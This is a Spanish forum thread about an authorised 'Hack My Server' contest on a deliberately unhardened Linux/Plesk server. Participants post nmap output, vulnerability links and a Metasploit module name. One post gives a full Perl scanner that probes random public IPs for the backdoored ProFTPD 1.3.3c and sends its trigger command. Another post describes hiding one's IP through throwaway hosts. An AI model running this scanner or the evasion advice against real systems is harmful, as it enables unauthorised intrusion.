Hack My Server
El próximo día 01/05/2012 empezará un concurso que se tratará de Crackear un servidor (Totalmente legal todo). El concurso durará 30 días y si obtenemos permiso de el-brujo seguramente estará patrocinado por alguna empresa y habrá algún premio :-)
Bases:
Daremos la IP del servidor que hay que Crackear.- El servidor no tiene seguridad.
- L
a IP del servidor se dará por privado.
También me gustaría dejar claro que la idea de realizar esto es para que todos los usuarios aprendamos de todos, por lo que los organizadores agradeceriamos que se realizaran comentarios para que así todo el foro poco a poco fuera consiguiendo acceder al servidor.
CONDICIONES
- Se trata de ser colaborativos, es decir, si pedis la IP para atacar, contar en este POST como vais a atacar y lo que habeis conseguido.
- La idea es que entre todos aprendamos.
- Si alguien pide la IP, va atacando y no va informando en este POST, la próxima vez no se le entregará la IP del servidor.
GANADOR
- Será el primero que consiga acceder como Root.
- Tendrá que haber participado en este foro comentando, etc...
- Se le enviará una botella (España) de cerveza.
- La cerveza será una HACKER PSCHORR (http://kd59.files.wordpress.com/2010/03/hackerpschorrweisse.jpg) importada desde alemania.
¡Que gane el mejor!
-------------------------------------------
PUNTACIÓNBelial & Grimoire - GANADOR - Muestra con que 2 exploits intentó atacar y con que programa: 1 punto
- Indique que file de Plesk es 'posiblemente' vulnerable. : 1 punto
- Muestra bug y link para posible XSS/SQLi en Plesk: 1 punto
- Muestra escaneo positivo e indica el programa: 1 punto
maxim_o - Saca servicios del servidor: 2 puntos
- Descubre posible vulneración (no es al final): 1 punto
opportunity - Posible SQLi en el Plesk: 1 punto
- Muestra IP del server: -1000 puntos
- Comparte posible SQLi: 1 punto
adastra - Muestra el source para atacar si fuera vulnerable el proFTP: 1 punto
- Aporta como ha intentado acceder al PLESK y resuelve dudas: 1 punto
- Adastra prueba exploit y comparte resultado: 1 punto
m0rf - Encuentra una vulnerabilidad (pero tiene que tiene que ser en local): 1 punto
- Comparte exploit posible vulnerabilidad: 1 punto
ESTE CONCURSO HA TERMINADO
buenisima idea, se agradecen cosas asi en el foro!
ademas para la gente como yo que no tiene ni idea de acceder a un servidor esto seguro que le vendra muy bien para practicar un poco.
aunque una pregunta... se podria incluir en las bases que el ganador (o los ganadores) explicasen como lo han logrado? una vez acabado el concurso claro.
Supongo que no lo diras pero, sera linux o windows el server? :silbar:
Por si no ha quedado claro en el otro tema: me apunto!
Y me alegro de que haya salido adelante ;)
Citaraunque una pregunta... se podria incluir en las bases que el ganador (o los ganadores) explicasen como lo han logrado? una vez acabado el concurso claro.
- Se me olvidó comentarlo, solo podrá nombrarse 'ganador' el que explique como lo ha realizado, puesto que esto es para aprender.
CitarSupongo que no lo diras pero, sera linux o windows el server?
No me importa mucho decirlo pues es fácil saberlo: Linux.
De todos modos pondré la versión del SO y los puertos serán de serie.
Realmente no es más que un servidor reción instalado con un servidor apache, php, etc... pero nada securizado :-)
Que buena idea, así aprendemos un poco todos.
Cita de: dimitrix en 25 Abril 2012, 01:36 AM
- Se me olvidó comentarlo, solo podrá nombrarse 'ganador' el que explique como lo ha realizado, puesto que esto es para aprender.
No me importa mucho decirlo pues es fácil saberlo: Linux.
De todos modos pondré la versión del SO y los puertos serán de serie.
Realmente no es más que un servidor reción instalado con un servidor apache, php, etc... pero nada securizado :-)
Ok.
Aguantara no? xDD
donde me apunto :)
CitarAguantara no? xDD
- Los ataques espero que no xDDD
- Fisicamente es un servidor contratado, no está en mi casa...
Si lo dejo 'fácil' es para ir aprendiendo todos poco a poco y luego ir subiendo la seguridad, etc...
Cita de: isseu en 25 Abril 2012, 02:19 AM
donde me apunto :)
El 1/5/2012 lo diré.
Uy pero que bueno estara esto ;-)
Corriendo un live cd de Back Track 5 ya sirve? sin instalarlo me refiero.
Se espera el Teorico para ir estudiando dias antes xD
Cita de: $Edu$ en 25 Abril 2012, 15:38 PM
Corriendo un live cd de Back Track 5 ya sirve? sin instalarlo me refiero.
Se espera el Teorico para ir estudiando dias antes xD
Cada uno puede atacar como quiera :-)
PD: Yo también usaré el BT5
Cita de: puntoinfinito en 25 Abril 2012, 17:56 PM
Edu tienes razón, el teórico...
No entiendo lo del teórico ¿Podeis explicarlo?
Esto es una especie de concurso, no es un Tuto, una vez alguien consiga acceder, ya se realizará el tuto.
Vale todo? jeje. Salu2
Cita de: jpmo4 en 26 Abril 2012, 00:04 AM
Vale todo? jeje. Salu2
Sí, excepto ataques por fuerza bruta y D/DOS.
Estoy emocionado, al menos intentar poner en practica, lo "minimum" que aprendi aqui... Solo el intento ya me dejara feliz.... Gracias, elhacker.net ;D
Cita de: dimitrix en 25 Abril 2012, 00:40 AM
Hack My Server
El próximo día 01/05/2012 empezará un concurso que se tratará de Crackear un servidor (Totalmente legal todo). El concurso durará 30 días y si obtenemos permiso de el-brujo seguramente estará patrocinado por alguna empresa y habrá algún premio :-)
Bases:
- Daremos la IP del servidor que hay que Crackear.
- El servidor no tiene seguridad.
- La IP del servidor se dará por privado.
- Existirán 3 podios. Dependiendo el nivel de intrusión.
También me gustaría dejar claro que la idea de realizar esto es para que todos los usuarios aprendamos de todos, por lo que los organizadores agradeceriamos que se realizaran comentarios para que así todo el foro poco a poco fuera consiguiendo acceder al servidor.
Esta idea ha salido de aquí (http://foro.elhacker.net/foro_libre/propuesta_curso_ethical_hacking-t358544.0.html).
¡Comentarme que os parece!
Dimitrix, lo que pasa que como dejabas claro que esta idea salio del post del curso de ethical hacking.. pensaba que era relacionado, es decir, lo que aprendemos ahi aplicarlo en tu servidor. Pero bien, esto es cosa a parte, aca intentaran los que ya sepan del tema, yo me quedare viendo como van entonces xD Saludos!
Cita de: $Edu$ en 26 Abril 2012, 16:02 PM
Dimitrix, lo que pasa que como dejabas claro que esta idea salio del post del curso de ethical hacking.. pensaba que era relacionado, es decir, lo que aprendemos ahi aplicarlo en tu servidor. Pero bien, esto es cosa a parte, aca intentaran los que ya sepan del tema, yo me quedare viendo como van entonces xD Saludos!
Bueno, esa parte vendrá después, la idea es que 'entre todos' pongamos poco a poco ideas y consigamos crackear el servidor. Y luego veremos paso a paso como se hace.
Luego prepararemos ataques de SQL Injection, XSS, etc...
No si, esta bien, no hay problema, yo mirare como lo hacen aca y aprendere lo que no he podido aprender aun, que es el pase de una vez infectada la web pasarse al control de la pc, si es que es eso por lo menos lo que haran, eso espero xD
Cita de: dimitrix en 26 Abril 2012, 01:10 AM
Sí, excepto ataques por fuerza bruta y D/DOS.
****** mis preferidos. Que sepan que participare...
Y porque no se podrian ataques de fuerza bruta para encontrar las claves?....lo de DOS està mal pero fuerza bruta no le veo el porque
Cita de: raptorfx7 en 27 Abril 2012, 00:59 AM
Y porque no se podrian ataques de fuerza bruta para encontrar las claves?....lo de DOS està mal pero fuerza bruta no le veo el porque
No es uan buena forma. No se trata de probar un diccionario de 1000 claves, sino que se puede tirar haciendo varios millones de combinaciones para no encontrar nada.
Buena La Iniciativa Espero Poder Aprender'
El servidor sera 100% nuevo? Es porque tengo un metodo que ya use una vez y depende de lo nuevo que sea.
yo tmb me apunto
A ver... Esto no tiene que ser vamos a reventar el servidor o colapsarlo... por eso fuerza bruta y Dos creo que es jorobar a todo el mundo....
El tema es sencillo, supongo que pondrá un servidor basado en linux con sus diferentes servicios corriendo etc sin parchear....
Los que participen prueban , miran, buscan vulnerabilidades, las explotan , y se le manda cuando se haya accedido al servidor... Se va poniendo las diferentes formas de las que se ha accedido detalladamente para que los que no lo logren/logremos aprendamos....
Y supongo que conforme se vaya superando, ira poniendo mas tramas parches etc
Vamos, creo que esa era la idea... Y mientras se van haciendo las cosas se vaya poniendo en el foro para que entre todos se logre entrar.... Un servidor para aprender y que aprendamos todos de todos.... No en plan entro soy el mejor ale .....
Me parece una buena iniciativa, yo me apunto :)
Cita de: ELVJop en 27 Abril 2012, 19:45 PM
El servidor sera 100% nuevo? Es porque tengo un metodo que ya use una vez y depende de lo nuevo que sea.
No lo entiendo muy bien, el SO lo instalé hace 1 semana.
Cita de: maxim_o en 27 Abril 2012, 20:28 PM
A ver... Esto no tiene que ser vamos a reventar el servidor o colapsarlo... por eso fuerza bruta y Dos creo que es jorobar a todo el mundo....
El tema es sencillo, supongo que pondrá un servidor basado en linux con sus diferentes servicios corriendo etc sin parchear....
Los que participen prueban , miran, buscan vulnerabilidades, las explotan , y se le manda cuando se haya accedido al servidor... Se va poniendo las diferentes formas de las que se ha accedido detalladamente para que los que no lo logren/logremos aprendamos....
Y supongo que conforme se vaya superando, ira poniendo mas tramas parches etc
Vamos, creo que esa era la idea... Y mientras se van haciendo las cosas se vaya poniendo en el foro para que entre todos se logre entrar.... Un servidor para aprender y que aprendamos todos de todos.... No en plan entro soy el mejor ale .....
Es justamente eso :-)
a mi me parece genial, ya me estoy oxidando un poco por la falta de tiempo para eso, seria bueno reafirmar y aprender mas
me gusta la idea, por favor haganla si necesitan ayuda espero pueda ayudar para lograrlo, me pone de buen humor cosas donde se pueda aprender y compartir como antiguamente se hacia
;-)
Me apunto!! >:D >:D
El primero que ingrese podria crear un archivo de texto, donde todos los que ingresen luego agregarian su nombre ahi xD
Buena idea exepto porque el que ingrese despues si es >:D malvado modificaria el archivo y pondria el suyo promero
Cita de: ELVJop en 28 Abril 2012, 18:26 PM
Buena idea exepto porque el que ingrese despues si es >:D malvado modificaria el archivo y pondria el suyo promero
Se trata de confiar entre nosotros y no ser cabrones.
PD: Para los españoles, como la ley en españa es muy dura, si necesitais alguna acreditación y/o confirmación para que ataqueis los servidores es todo legal, os la puedo ofrecer sin problemas.
Es una idea que siempre tuve en mente y por fin sale aquí, gracias dimitrix. Espero que no haya problema con la legalidad del asunto, todos estamos aquí para aprender más.
Saludos.
Si no me equivoco la lei española dice que si no lo denuncias no pasa nada tu no digas nada y ya esta
Cita de: ELVJop en 28 Abril 2012, 22:24 PM
Si no me equivoco la lei española dice que si no lo denuncias no pasa nada tu no digas nada y ya esta
No es cierto del todo. Según tengo entendido el intentar acceder a un servidor aunque no lo consigas es delito. Aunque está claro que si no hay denuncia no pasa nada.
Citar
No es cierto del todo. Según tengo entendido el intentar acceder a un servidor aunque no lo consigas es delito. Aunque está claro que si no hay denuncia no pasa nada.
1- WTF? No lo entiendo entonces siempre que voy a un servidor es delito? Espero que haya sido un error porque si no...
2- Lo que yo decia
3- Como se llama el servidor? (Si lo puedes decir ahora si no dilo con la IP)
Se refiere a intentar acceder atacandolo.. y si, es lo que decias vs ELVJop tambien. Lo que quiere decir es que no importa si por ejemplo accedes a facebook o no, iras preso si te denuncian solo por el hecho de intentarlo.
El servidor se llama Pirulo... mira lo que preguntas xD ya dijo que la ip la dara por MP luego, empezando el 1 de Mayo.
El nombre es muy importante si no mi metodo no funcionara. Ahora mismo te pongo tu reto si lo encuentro... (Ya sabes de que hilo hablo)
Cita de: ELVJop en 29 Abril 2012, 19:04 PM
El nombre es muy importante si no mi metodo no funcionara. Ahora mismo te pongo tu reto si lo encuentro... (Ya sabes de que hilo hablo)
Es que un servidor puede tener varios nombres asociados (de dominio), aunque la ip que lo resuelve solo tenga uno.
De todos modos, yo solo entregaré la IP, tu tendrás que resolver el nombre, con un ping o como quieras.
Estará listo hoy a las 00:00 ?
Cita de: m0rf en 30 Abril 2012, 15:37 PM
Estará listo hoy a las 00:00 ?
Pues eso me gustaría, pero todavía no se, se intentará :-)
@Dimitriiiiiiiiiiiixxxxxx, ¿habemus new serverrrrrr or not?
Tienes a la gente deseando irrrrrrrr...
...¡¡¡¡AL ATAKEEEEEEEEERRRRLLLL!!!!(http://www.gif-animados.net/gifs/famososcomicos-7.gif)
Ya tenemos server para trastear??? Seguimos esperando!!! >:D :silbar:
Sí, ya tenemos server, teneis que mandarme un MP y os envío la IP.
Ahora se desconecta! Mala pata la mia.
ELVJop ya te lo he enviado, al igual que a todos que me lo han pedido pro privado.
Algo muy importante, he cambiado las normas y ya he puesto el premio, así que miraros el primer mensaje de este POST.
Pues yo intente un programilla que se soluciono con un parche para linux que no se como te entra dentro y te dega trastear >:D la mala noticia es que no se porque no se si es tu server o que pero se me esta resistiendo. :-[
Bueno voy poniendo algo , mas que nada para que la gente que tiene más idea se vaya animando a postear.... ^^
Citar
nmap -O -v xxxxxxxxxxxxxxx
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp filtered domain
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
993/tcp open imaps
995/tcp open pop3s
1720/tcp filtered H.323/Q.931
3306/tcp filtered mysql
8443/tcp open https-alt
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.26
220 ProFTPD 1.3.3c Server (ProFTPD) 21
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7 22
ESMTP Postfix (Ubuntu) 25
Apache Server 80
llegue tarde pero vere si puedo lograr algo
Adios es 2.6.x? Ya me voy despidiendo...
Jajaja buen premio xD Espero la ip por privado Dimitrix, que quiero ir viendo por lo menos, saludos
si alguien me puede enviar la ip del server.
La ip, escribirle a dimitrixx y cuando se conecte os dará ip ....
No llegais tarde... ha empezado hoy y dura todo el mes... asi que no os agobieis.....
Mmmmm parece que la version de proftpd es vulnerable.....
http://www.securityfocus.com/bid/44933
Creo k el ganador del concuros explicara como lo hizo para ganar, y de paso los que perdieron aprenderian.
Como por ejemplo yo
Yo inteentare atacar al server seguramente no logro nada jaja.
Ya he respondido todas los mensajes privados, si le falta a alguien que me mande un mensaje privado y se la envío.
Por ahora - ProFTPD 1.3.3c Server (ProFTPD) 21
CitarProFTPd es un servidor FTP. Se promociona desde su página web como estable y seguro, cuando se configura correctamente. El servidor ProFTPd se promociona a sí mismo como un "Software servidor FTP altamente configurable con licencia GPL"
- Al parecer es vulnerable puesto que lo instala el Plesk, así que ya sabemos que tiene el PLESK.
Como explotarlo, más info: http://wiki.woop.es/ProFTPD_TELNET_IAC
Al parecer si conseguimos explotar esta vulnerabilidad podremos tirar el servidor.
Pero esa version no es vulnerable no?
Segun he leido eso se corrige en la 1.3.3c
2010-10-29 TJ Saunders∞, desarrollador de ProFTPD, abre la incidencia en el Bugzilla (Bug #3521 - Telnet IAC processing stack overflow∞) y horas después se libera la versión 1.3.3c∞ que soluciona el problema.
Versiones de ProFTPD vulnerables
Todas las versiones de ProFTPD comprendidas entre 1.3.2rc3 y 1.3.3b son vulnerables, el listado completo es:
1.3.2rc3
1.3.2rc4
1.3.2
1.3.3rc1
1.3.3rc2
1.3.3rc3
1.3.3rc4
1.3.3
1.3.3a
1.3.3b
Por lo que en este caso no podría ser explotada no?
A ver que tal... dado que es todo el mes, hay tiempo para jugar un poco.
Me apunto.
Vale, saco más datos con sus versiones
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/http Apache httpd
465/tcp open ssl/smtp Postfix smtpd
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
8443/tcp open ssl/http sw-cp-server httpd (Parallels Plesk WebAdmin version psa-10.2.0-1011110331.11)
Mmm... nos encontramos que mediante http y el puerto 8443 tenemos acceso al Plesk. http://*******:8443
Y lo mejor, tenemos la versión: 10.2.0
Cita de: adastra en 1 Mayo 2012, 20:08 PM
A ver que tal... dado que es todo el mes, hay tiempo para jugar un poco.
Me apunto.
Me alegra escuchar esto.
Buenas:
Curioso concurso, no tengo idea de hacking, aún así quiero aprender a protegerme ya que he instalado Apache con Windows y linux.
Hice un manual sobre Apache con Windows, más adelante lo haré con Linux. Este concurso está bien para ampliar conocimiento en seguridad para protegernos, de paso haré un manual más actualizado tanto en Windows como Linux.
Ver manual (http://electronica-pic.blogspot.com.es/2009/06/servidor-casero-apache-php-mysql.html)
Saludo.
Hola a todos :D
Yo tambien me uno al concurso!! jaja
Por ahora les daré un pequeño truco que tal vez algunos sepan ya pero es para que todos aprendamos n.n
En este caso (y casi que solo en este caso jaja) el servidor nos va a dejar atacar, el problema esta en que si lo hacemos desde nuestra casa hacia un servidor cualquiera, aunq tengamos algun proxy para ocultar ip, cabe la posibilidad de que rasteen nuestra ip.
Pues aqui les traigo como evitar eso.
El problema esencial está en que cuando conectamos a un servidor lo que realmente hacemos la mayoria de veces es darle los parámetros (como la IP nuestra) para que sea él el que se conecte a nosotros, creando un log (registro por asi decirlo) de quienes somos.
Imaginesen que pasaria si no nos conectaramos nosotros sino otra maquina siguiendo nuestras instrucciones y luego de esto cambiamos la ip de esa maquina por otra, haciendo que si el servidor victima trata de localizarnos no encuentre la maquina intermediaria.
Esto es posible con servicios como no-ip (debido a que ya me extendi un poco solo les puedo dar el nombre de este ejemplo) donde nos dan un server que se puede usar una vez y luego "renombrar" la ip o simplemente eliminarlo.
Esto es lo que llaman un método para ocultar IP y el que más me gusta :D
Ojalá les sirva!!
Cita de: puntoinfinito en 1 Mayo 2012, 21:31 PM
Voy bien, voy bien...
Recuerda que tienes que compartir. Para esto está creado este 'concurso' y estamos pagando el servidor, para que todos aprendamos.
Suerte :-)
La idea es no saber que SO usan para hackear, así averiguan cual es de paso.
Lo mejor es que no sepan que servidor Web usan, se puede desactivar el Apache y casi, cualquier otro, así se dificulta más. Recuerdo hace tiempo desafié a la gente, ni uno me han hackeado porque no tenían conocieminto necesario y sin cortafuegos.
Saludo.
Bueno pues yo me voy a poner haber si consigo algo >:D
Una duda que tengo, existe alguna aplicación web corriendo en el servidor a mayores del panel de control, como por ejemplo alguna web asociada con algún dominio? Creo que hay una manera de saberlo pero no tengo ni idea de como se hace :S
Edit: Haciendo un whois inverso me he topado con este dominio [borrado] :D pero parece que la aplicación web es la misma que sin ingresar el dominio.
No pongais ips , ni nombres de host, etc por que sino es tonteria que de la ip por privado....
Hola:
Lo primero que se hace es obtener cualquier información del servidor, tipo de Linux, versión exacta. Si lo saben, buscar en google vulneración y fallos de ese SO para localizar error. También con los demás programas, sea servidor FTP, Apache, etc.
si alguien descubre un fallo. ¿Se peude poner un archivo de texto en el escritorio que diga hola.txt, si es una Web, que ponga hola hola amigos?
Saludo.
Citar¿Se peude poner un archivo de texto en el escritorio que diga hola.txt, si es una Web, que ponga hola hola amigos?
Claro.
Aún se puede apuntar gente? me gustaría intentarlo si tengo un rato libre ;D Saludos.
Yo tambien me apunto, todo sea por aprender. Un saludo a todos.
Ayer hice el escaneo, y prove el exploit del proftp. El exploit no me funcionó, hoy probaré otra vez ya que tenia algunos problemas con el firewall.
De pasada vi también que hay un sql inject y xss en el plesk. A parte el openssh tiene este concepto para un exploit (que en teoria funciona), se trata de compilar jpake en tu cliente con los archivos que hay en este enlace: https://github.com/seb-m/jpake/tree/master/openssl-jpake/ (https://github.com/seb-m/jpake/tree/master/openssl-jpake/)
Este exploit solo funcionara por lo que tengo entendido si el servidor tiene compilada la parte de jpake, sino no funcionara.
No he buscado más para el openssh, lo único que encontre fueron un par de DOS diría, pero ahí lo deje.
Pues nada acabo de poner a punto el sistema y os cuento más en unas horas/minutos. Me parece que voy a continuar con el clásico nc.exe xDD
Saludos.
Probé el exploit para el ProFTP pero parece que el server no es de los que está backdorizado(http://www.1337day.com/exploits/15026)
También le heché un vistazo a los métodos del HTTP (nada interesante)
Mañana si tengo algo de tiempo busco ese SQLi
Saludos!
El proftpd no está backdorizado.... en teoria esa version fue backdorizada hace mucho tiempo por que entraron en el servidor de proftp y cambiaron el archivo original por la version backdorizada y estuvo asi unos dias en descarga ... pero ahora mismo ya no es así.
En teoria tiene una vulnerabilidad http://www.securityfocus.com/bid/44933/info la cual si se explota te da permisos de root, y si no funciona igual le haces un dos a la maquina....
En esta pagina sale la informacion y programación etc del exploit: http://phrack.org/issues.html?issue=67&id=7#article
Ahora el plesk panel 10.2.0 es vulnerable a ataques de sql inyection y xss y tambien una vulnerabilidad remota pero no veo informacion de como poder explotarla.
http://www.securityfocus.com/bid/52267
http://www.securityfocus.com/bid/49887
maxim_o Ayer me encontré con lo del Plesk, pero creo que para el SQLi necesita tener un Addon que no viene de serio 'creo'.
Aunque todavia no tengo la IP del server me he puesto con ello viendo la info que estais dejando.
Viendo que tiene Plesk y la version he visto varias vulnerabiliades:
http://kb.parallels.com/es/113324
http://www.exploit-db.com/exploits/15313/
Hace unos meses hubo algo muy gordo relacionado con Plesk quizás va por ahí el tema.
ya tengo la ip!!!! thanks a lot.
Me apunto a echar un vistazo... Si sois tan amables de enviarme la IP...
Un saludo!
Dimitrix, pon la IP, sino algunos tendrán que esperar a que le envies.
Creo que de eso se trata que le escriban un privado.... hay un mes entero... tampoco hay prisa asi cualquiera que ojee el tema no podra ponerse a atacar y solo "jueguen" los que participan en el
Ah, hostia ya no me acordaba del mes xD
Entonces, ¡Paciencia!
Exacto, la idea es que participemos todos, ya que estoy pagando todo esto, lo único que espero es que la gente 'colabore'.
No ataque para probar y no publique lo que encuentra. Si quieren hacer eso me parece muy bien, pero no con mi server. Aquí quien quiere atacar que colabore. Esto es una comunidad :-)
Yo creo que el punto más débil como habéis comentado es el panel de parallels, esta vulnerabilidad http://kb.parallels.com/en/113313. Con lo que en teoría se podría entrar por ahí.
Pero el problema es que en ningún sitio encuentro realmente en que consiste realmente el fallo, lo único que hay es esto http://www.exploit-db.com/exploits/15313/, pero se trata de un parallels plesk sobre Windows. He tratado de reproducir las peticiones que hace el fulano pero no hay manera de obtener ni siquiera un simple error.
Yo estoy preparando todo tipo de cosas para probarlas en cuanto dimitrix me pase su IP xD
¿Me la pasas por favor? Así comenzaré a probar :P
Saludos
Cita de: Breixo en 2 Mayo 2012, 15:17 PM
Yo creo que el punto más débil como habéis comentado es el panel de parallels, esta vulnerabilidad http://kb.parallels.com/en/113313. Con lo que en teoría se podría entrar por ahí.
Pero el problema es que en ningún sitio encuentro realmente en que consiste realmente el fallo, lo único que hay es esto http://www.exploit-db.com/exploits/15313/, pero se trata de un parallels plesk sobre Windows. He tratado de reproducir las peticiones que hace el fulano pero no hay manera de obtener ni siquiera un simple error.
El problema es que con un SQLi tendrás que escalar mucho, pero puede funcionar.
Cita de: puntoinfinito en 2 Mayo 2012, 15:24 PM
Yo estoy preparando todo tipo de cosas para probarlas en cuanto dimitrix me pase su IP xD
¿Me la pasas por favor? Así comenzaré a probar :P
Saludos
No tengo ningún MP tuyo, pero ya te lo he enviado :-P
Me apunto.
Por otro lado, y no es por tirar malas onda, pero si es un VPS contratado, con plesk y toda la cosa, seguramente este actualizado y bien configurado. Cada VPS nuevo que una empresa alquila no es ams que una copia de una 'imagen' virtual preconfigurada, y dicha empresa depende totalmente de que sus productos sean muy seguros. Es decir, es muyy difcil que un servicio de pago no brinde la mayor seguridad posible y actualizaciones mas recientes de su software... :silbar:
Asi que basicamente estariamos auditando gratis xD
Saludos
Mejor aun para testear nosotros, si logramos entrar a un servidor actualizado y en "produccion" es muchisimo mas interesante y divertido. Si no logramos entrar, pues bueno... A seguir estudiando! :P
Hay que verle el lado positivo a todo!
Estoy revisando esas sqlinjection y hasta ahora nada, voy a instalar ese plesk aqui local para probar, cualquier novedad la posteo.
Cita de: El As del Club Paris en 2 Mayo 2012, 15:40 PM
Me apunto.
Por otro lado, y no es por tirar malas onda, pero si es un VPS contratado, con plesk y toda la cosa, seguramente este actualizado y bien configurado. Cada VPS nuevo que una empresa alquila no es ams que una copia de una 'imagen' virtual preconfigurada, y dicha empresa depende totalmente de que sus productos sean muy seguros. Es decir, es muyy difcil que un servicio de pago no brinde la mayor seguridad posible y actualizaciones mas recientes de su software... :silbar:
Asi que basicamente estariamos auditando gratis xD
Saludos
No lo veo cierto de todo, en un VPS/Servidor no administrado la seguridad corre de tu parte.
Además que una se monta el servidor ellos no actualizan el VPS, lo máximo que hacen es una vez al mes enviarte instrucciones de como arreglar los nuevos bugs que han salido, pero ellos no lo arreglan ni lo tocan.
Por otra si el día 15 nadie ha conseguido algo, intalaré aplicaciones 'corrientes' pero que sepa que tienen vulnerabilidades.
Ahhh a todo esto, las versiones que están instaladas ya son viejas, no son las más actuales.
Bueno leyendo y consultando con nuestro amigo google el proftpd 1.3.3c si las configuraciones están por defecto será dificil romper, ya que lo único que encontre solo funciona si tiene el mod_sql instalado y funcionando y por defecto no es así.
Asi que tendremos que centrarnos en el plesk y/o en otros servicios....
el servicio proftpd que esta instalado no es vulnerable.
Podéis probarlo con el script "bitchscan.pl" o directamente desde el modulo de metasploit "exploit/unix/ftp/proftpd_133c_backdoor"
Para los que querais probar el script, pongo el código
en la linea
$ip = "x.x.x.x";
poner la dirección que os han enviado por correo, el script encuentra que el servicio tiene la versión que es vulnerable, pero después de ejecutar, no es posible establecer el backdoor, indicando que el servicio no es "hackeable".
#!/usr/bin/perl
use IO::Socket;
## IP GENERATOR ##
print "\n! ProScan - Started !\n";
sub ipgen(){
my $range1 = 223; #avoid experimental and multicast
my $range2 = 240;
$oct1 = int(rand($range1)) + 1; #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;
if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen(); #if local or private call again
}else{
#$ip = "$oct1.$oct2.$oct3.$oct4"; # otherwise allocate the ip to return
$ip = "x.x.x.x";
}
return $ip; #return to caller
}
##
## MAIN ##
while(1==1){ # keeps code running indefinatly
$target = &ipgen(); # get random ip to scan
print "SCANNING: $target \n"; # output
my $sock = new IO::Socket::INET ( # try to create socket to chose random address
PeerAddr => $target,
PeerPort => '21',
Proto => 'tcp',
Timeout => '3', # you can get away with a timeout of 1 second but i have 3 to be safe
);
if($sock){ # if socket opened (port open)
sysread($sock,$buf,1024); # readheader - may need to make the buffer size 4096 instead of 1024
print "FTP SUCCESS: $target \n"; # print to screen
if ($buf =~ m/ProFTPD 1.3.3c/){
print "\n!!Proftpd 1.3.3c Found!!\n";
print $sock "HELP ACIDBITCHEZ\n";
sysread($sock,$buf,1024);
if ($buf =~ m/502/){
print "\n NOT HACKABLE \n";
}else{
print $buf;
print "\n\n HACKABLE BOX FOUND \n\n";
open (MYFILE, '>>proftpd_1.3.3c-exploitable.txt');
print MYFILE "Proftp Found: $target :$buf\n";
close(MYFILE);
}
}
}
close($sock); # close the socket
}##
Incluso con nmap:
nmap --script=ftp-proftpd-backdoor.nse <ip> <puerto>
Saldos!
Por fin pude!!!!
No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/
Cita de: $Edu$ en 2 Mayo 2012, 19:19 PM
Por fin pude!!!!
No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/
Todo servidor es hackeable, hace falta encontrar la vulnerabilidad.
El servidor no tiene ni firewall ni nada, no obstante si el día 15 (o mejor el 7) nadie consigue nada, iré bajando la seguridad.
Estoy pensando que por ahora la seguridad perimetral es quizás muy difícil para casi todos por lo que el mes que viene haré.
- Hack My Server: Joomla
- Hack My Server: WP
Buenas ví que tiene un servidor de correo IMAP. Creo que IMAP tiene una vulnerabilidad que mediante un desbordamiento de buffer se podría conseguir obtener una shell... Me voy a poner a ello.
Me puedes pasar la ip por privado :)
Saludos
Hola señores, todavia no he mirado nada de esto, se sabe si hay alguna cuenta en el FTP? Buscando por la red encontre una vulnerabilidad para las versiones inferiores a la 1.3.3g. La vulnerabilidad se basa en enviar un comando inexistente o erroneo al servidor mientras se esta descargando o subiendo un archivo. La vulnerabilidad permitiria inyectar cogido arbitrario.
http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html (http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html)
En ese link creado por mi teneis los scripts pero para uso local y necesitamos alguien con conocimientos en python para que lo pase a remoto, yo lo he intentado pero no tengo ni idea de python si alguien sabe que ponga la respuesta en el link. Un saludo y suerte.
Hola buenas después de mirar la información de dimitrix sobre los servicios del server, voy a probar el siguiente:
Servicio
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
voy a investigar un poco más sobre eso y a ver que sale.
: )
me puedes enviar la IP?
mercii!
quiero la ip ... manda-mela a @elhacker
me la suda el server yo solo quiero la cerveza, y lo sabes :xD :xD soy un borracho jajaja
Cita de: lokitorz en 2 Mayo 2012, 20:02 PM
Buenas ví que tiene un servidor de correo IMAP. Creo que IMAP tiene una vulnerabilidad que mediante un desbordamiento de buffer se podría conseguir obtener una shell... Me voy a poner a ello.
Estuve escaneando de todo ayer, y me vino a la cabeza esta vulnerabilidad. Encontré un exploit pero es para BSD. Como no entiendo asm no sé como establecer la dirección de la pila correctamente por lo que me quedo sin probarlo :/
Por lo demás estoy como vosotros, he probado exploit por ftp, pop, imap y sigo a dos velas, aun así seguiré investigando :D
Saludos.
Si vemos que no lo conseguimos, instalo más aplicaciones y modifico otras para que sea vulnerable.
La que ya tengo vista es instalar la de proFTP la vulnerable, que tengo ganas de practicar^^
Cita de: dimitrix en 3 Mayo 2012, 01:13 AM
Si vemos que no lo conseguimos, instalo más aplicaciones y modifico otras para que sea vulnerable.
La que ya tengo vista es instalar la de proFTP la vulnerable, que tengo ganas de practicar^^
Una idea que se me pasa por la cabeza es que también se podría poner alguna aplicación web vulnerable, desde ella se podría subir una shell(php por ejemplo) y una vez conseguido esto ganar privilegios de root con algún exploit que solo sea local.
